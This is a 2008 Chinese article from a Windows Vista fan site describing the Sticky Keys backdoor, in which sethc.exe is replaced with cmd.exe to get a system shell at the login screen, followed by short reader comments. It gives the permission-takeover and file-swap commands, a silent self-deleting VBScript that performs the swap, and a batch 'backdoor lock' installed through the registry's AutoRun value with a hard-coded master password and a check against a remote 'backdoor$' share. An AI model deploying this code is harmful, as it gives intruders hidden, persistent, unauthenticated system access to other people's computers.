优化大师全新一代!   魔方3系!
当前位置:首页 >> Vista应用 >> Vista安全

利用粘滞键,打造入侵Windows Vista系统的爆酷后门


2008年3月16日 编辑:Vista之家 - vista123.com 人气: 评论:15

Vista之家www.vista123.com):利用粘滞键,打造入侵Windows Vista系统的爆酷后门

什么是粘滞键?

看过Vista之家之前文章的朋友,肯定晓得。当你在Windows操作系统里面连续按下5次Shift键之后,你看看出来了什么?

在windows 2000/xp/Vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。

一、具体的替换方法:

XP系统:
将安装源光盘弹出(或将硬盘上的安装目录改名)
cd %widnir%\system32\dllcache
ren sethc.exe *.ex~
cd %widnir%\system32
copy /y cmd.exe sethc.exe

Vista系统:
takeown /f c:\windows\system32\sethc.exe
cacls c:\windows\system32\sethc.exe /G administrator:F
Vista之家www.vista123.com)备注:上两步为获得权限的命令,你也可以通过Vista优化大师获得右键菜单的提升权限的功能,然后在sethc.exe文件上面右键直接提升权限。
然后按XP方法替换文件

在登录界面按5此SHIFT,出来cmd shell,然后……

二、后门扩展:

Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe", 0, True)
success = obj.run("cmd /c echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F", 0, True)
success = obj.run("cmd /c copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe", 0, True)
success = obj.run("cmd /c copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe", 0, True)
success = obj.run("cmd /c del %SystemRoot%\system32\sethc.exe", 0, True)
success = obj.run("cmd /c ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)

第二句最有意思了.嘿嘿..自动应答....以前就遇到过类似的问题

再更新,加个自删除、简化代码:
On Error Resume Next
Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F&copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe&copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)

三、后门锁扩展:

allyesno注:可以采用cmd 锁 来进行cmdshell的密码验证 嘿嘿。。。

用下面的后门锁的方法是 把代码保存为bdlock.bat

然后修改注册表位置即可

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]
"AutoRun"="bdlock.bat"

@Echo Off
title 后门登陆验证
color a
cls
set temprandom=%RANDOM%
echo 请输入验证码:%temprandom%
set/p check=
if "%check%"=="%temprandom%%temprandom%" goto passcheck
if "%check%"=="%temprandom%" (
rem 后门服务器验证
rem 如果没有后门验证服务器请rem注释掉下一行代码
if exist \192.168.8.8\backdoor$\pass goto passcheck
)
echo 验证失败
pause
exit
:passcheck
echo 验证成功
If "%passcmdlock%"==http://www.6655.com/ Goto endx
Set passcmdlock=http://www.6655.com/ 
:allyesno
Set Errorlevel=>nul
Echo 请输入验证密码?
Set password=allyesno Is a pig>nul
Set/p password=
rem 万能密码
if "%password%"=="allyesno is a sb" goto endx
If %time:~1,1%==0 Set timechange=a
If %time:~1,1%==1 Set timechange=b
If %time:~1,1%==2 Set timechange=c
If %time:~1,1%==3 Set timechange=d
If %time:~1,1%==4 Set timechange=e
If %time:~1,1%==5 Set timechange=f
If %time:~1,1%==6 Set timechange=g
If %time:~1,1%==7 Set timechange=h
If %time:~1,1%==8 Set timechange=i
If %time:~1,1%==9 Set timechange=j
set/a sum=%time:~1,1%+%time:~1,1%
Set password|findstr "^password=%timechange%%time:~1,1%%date:~8,2%%sum%$">nul
If "%errorlevel%"=="0" cls&Echo 口令正确&Goto End
Echo 请联系Vista之家咨询正确密码!&Goto allyesno
:End
Set password=>nul
Set Errorlevel=>nul
Echo 很好,很和谐!
:endx

Vista之家www.vista123.com),爱上网,爱上Vista123.com

      
Vista之家网友 (121.30.85.*) 于 2009-2-15 20:25:53 发表下列评论:   [删除]
教大家去开个后门?
Vista之家网友 (221.204.54.*) 于 2008-10-22 18:16:58 发表下列评论:   [删除]
不懂 不明白
Vista之家网友 (116.19.251.*) 于 2008-6-15 11:06:08 发表下列评论:   [删除]
我晕了
Vista之家网友 (221.207.180.*) 于 2008-5-25 14:24:12 发表下列评论:   [删除]
!@$#$$$^%$$%&^%^^&*^^&%^$%$#$##(*&^%#@@!!什么东东啊!
Vista之家网友 (117.32.130.*) 于 2008-3-27 21:46:50 发表下列评论:   [删除]
看不懂,还是菜鸟多啊。说的详细具体点行么
Vista之家网友 (60.161.21.*) 于 2008-3-23 0:34:10 发表下列评论:   [删除]
又是高手
Vista之家网友 (60.164.174.*) 于 2008-3-18 8:30:24 发表下列评论:   [删除]
这样做是要干什么啊?
Vista之家网友 (125.75.41.*) 于 2008-3-17 21:08:01 发表下列评论:   [删除]
我的电脑是Vista系统的 我想了解这方面的知识 可看不懂这些东东
Vista之家网友 (125.114.202.*) 于 2008-3-16 22:37:03 发表下列评论:   [删除]
听不明白啊。到底什么用的啊!
Vista之家网友 (58.213.116.*) 于 2008-3-16 21:36:33 发表下列评论:   [删除]
这个后门ms都没堵上么
发表评论(最新评论将在5分钟内出现
昵称:
内容:
(按Control+Enter直接提交)   点击一下,Vista问题有问必答
Vista优化大师
闪游 - 最快最强最安全的网络浏览器
windows7 优化大师
酷点,酷点桌面

Windows 下用什么杀毒软件最好最安全?
Windows 系统上网更加可靠
把您的Windows系统打造成一个铜墙铁壁之完全攻略

新手玩转Windows系统速成大法
从入门到精通,Windows听我指挥
做Windows 高手并不难,怎么学?

最便宜的装Win7的名牌电脑多少钱?
预装Win7的品牌机大PK
联想、戴尔、索尼等笔记本大促销

如何免费升级到 Windows 7?
戴尔推出免费教程教你升级Win7
安装升级Windows 7,其实就这么简单!

索尼 Win7 笔记本电脑1999元特价热销
七天免费试用?免费升级内存硬盘?
更有超多礼物发送中,不抢白不抢

Win7系统出现问题怎么办?
电脑有故障,“医生”来帮忙
我有电脑医生,修复电脑简单轻松!

热门文章
软媒旗下软件闪游,最好用的浏览器 | 魔方优化大师 | 酷点,美美的桌面 | Windows7优化大师 | Windows8优化大师 | Vista优化大师 | Vista一键还原 | 魔法IE
软媒旗下网站6655网址之家 | 9955网址大全 | IT之家 | Win8之家 | Win7之家 | Vista之家 | 乐购网 | Win8/Win7论坛